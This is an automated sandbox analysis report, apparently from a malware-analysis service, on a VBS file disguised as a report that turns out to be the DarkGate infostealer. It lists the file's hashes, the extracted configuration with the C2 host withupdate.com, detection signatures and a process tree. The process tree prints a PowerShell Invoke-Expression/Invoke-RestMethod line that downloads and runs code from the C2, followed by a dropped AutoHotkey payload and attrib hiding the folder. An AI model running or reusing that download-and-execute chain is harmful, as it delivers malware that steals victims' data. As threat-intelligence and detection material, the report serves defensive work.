Overview

overview

10

Static

static

1

27032024_0...24.vbs

windows7-x64

3

27032024_0...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2024 16:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    27032024_0037_Report-26-2024.vbs

  • Size

    12KB

  • MD5

    b371387b0b5551c936c94bdf36c2e2f5

  • SHA1

    2f40590d998688bd681ea0afcea615b6a348cb31

  • SHA256

    038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907

  • SHA512

    2c31bc7357c6b87b85cf44cedb9b864c6050544707a0f053121833ce677b99fa1094b2850b4ac73520e31b4804830d39f96ae506ae57f4fa7c49e9f04317b057

  • SSDEEP

    192:QMg119gkCtL3IqSPN3QzGNzUoNzhLnOdEpeLSHZgNdPR/Dnm9V4nN/Z/:Ly19gR3IquNgzG2oNdOdEpeeqlPxd

Score
10/10
darkgateadmin888stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

withupdate.com

Attributes
  • anti_analysis

    true

  • anti_debug

    false

  • anti_vm

    true

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    VqunyHFY

  • minimum_disk

    50

  • minimum_ram

    4000

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27032024_0037_Report-26-2024.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1356
      • C:\rjtu\AutoHotkey.exe
        "C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        PID:3160
      • C:\Windows\system32\attrib.exe
        "C:\Windows\system32\attrib.exe" +h C:/rjtu/
        3⤵
        • Views/modifies file attributes
        PID:1960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oaintbfo.rrn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\rjtu\AutoHotkey.exe
    Filesize

    892KB

    MD5

    a59a2d3e5dda7aca6ec879263aa42fd3

    SHA1

    312d496ec90eb30d5319307d47bfef602b6b8c6c

    SHA256

    897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

    SHA512

    852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

    Download Submit

  • C:\rjtu\script.ahk
    Filesize

    55KB

    MD5

    e93f832ee64b07207c38479dbf3ee767

    SHA1

    7f4a0063a53ed2ba9c2c2e77eacea34ccfbb99f7

    SHA256

    dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455

    SHA512

    f46fafc946b0155ab43df99e92f5050e8967ac9528a465afc027801b20431d1c5c8f44a10c04738a995b8819f173e6cf270ab70ed352f69794cef9176f52fe51

    Download Submit

  • C:\rjtu\test.txt
    Filesize

    64KB

    MD5

    00309ea2d3859d73492152a8326400fb

    SHA1

    45a7010076e2b6942605261109ff889a56aa078a

    SHA256

    4e8929c00821215dc16b66b3032dac248bb41c574cf48d6393ebe75adaca1d97

    SHA512

    276543b7d0a6110c2e6f7fc845711c92702fcc86e1d5428ff181cb42b294fda22929f5609599b5847b705af74f684c06880e9e31fcdb9676d1b90ea804dffb1b

    Download Submit

  • memory/1356-9-0x00000245502B0000-0x00000245502D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1356-10-0x00007FFFA11D0000-0x00007FFFA1C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1356-11-0x0000024550130000-0x0000024550140000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1356-12-0x00000245509B0000-0x0000024550B72000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1356-18-0x00007FFFA11D0000-0x00007FFFA1C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1356-32-0x00007FFFA11D0000-0x00007FFFA1C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3160-34-0x0000000002D50000-0x0000000002DC3000-memory.dmp

    Filesize

    460KB

    Download

  • memory/3160-36-0x0000000002D50000-0x0000000002DC3000-memory.dmp

    Filesize

    460KB

    Download